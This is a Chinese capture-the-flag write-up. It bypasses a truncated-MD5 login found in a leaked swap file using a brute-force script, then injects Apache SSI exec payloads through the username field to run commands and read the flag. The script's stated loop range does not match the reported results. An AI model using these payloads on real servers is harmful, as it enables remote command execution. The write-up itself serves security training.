扫描发现为index.php.swp源码泄漏
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
代码审计-登录
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
POST获取username参数且不为空,password md5后的前六位为6d0bc1即可登陆
编写脚本
import hashlib
for i in range(1000000):
password = hashlib.md5(str(i)).hexdigest()
if password[0:6] == '6d0bc1':
print('%d:%s') % (i, password)
2020666: 6d0bc1153791aa2b4e18b4f344f26ab4
2305004: 6d0bc1ec71a9b814677b85e3ac9c3d40
9162671: 6d0bc11ea877b37d694b38ba8a45b19c
使用任一密码登录,用户名随意,查找发现什么内容也没有
Apache SSI 远程命令执行漏洞
重新查看源码,发现存储文件后缀为shtml,可以利用Apache SSI 远程命令执行漏洞
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
这里是将username内容写到了shtml文件中,所以利用点在username
<!--#exec cmd="whoami" -->
访问对应的shtml文件可查看内容
最后在上级目录发现flag文件
<!--#exec cmd="ls ../" -->
flag_990c66bf85a09c664f0b6741840499b2 index.php index.php.swp public
读取flag文件
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2" -->
得到flag
flag{973a1378-a4b8-48d0-8ff9-acf1f0434c3f}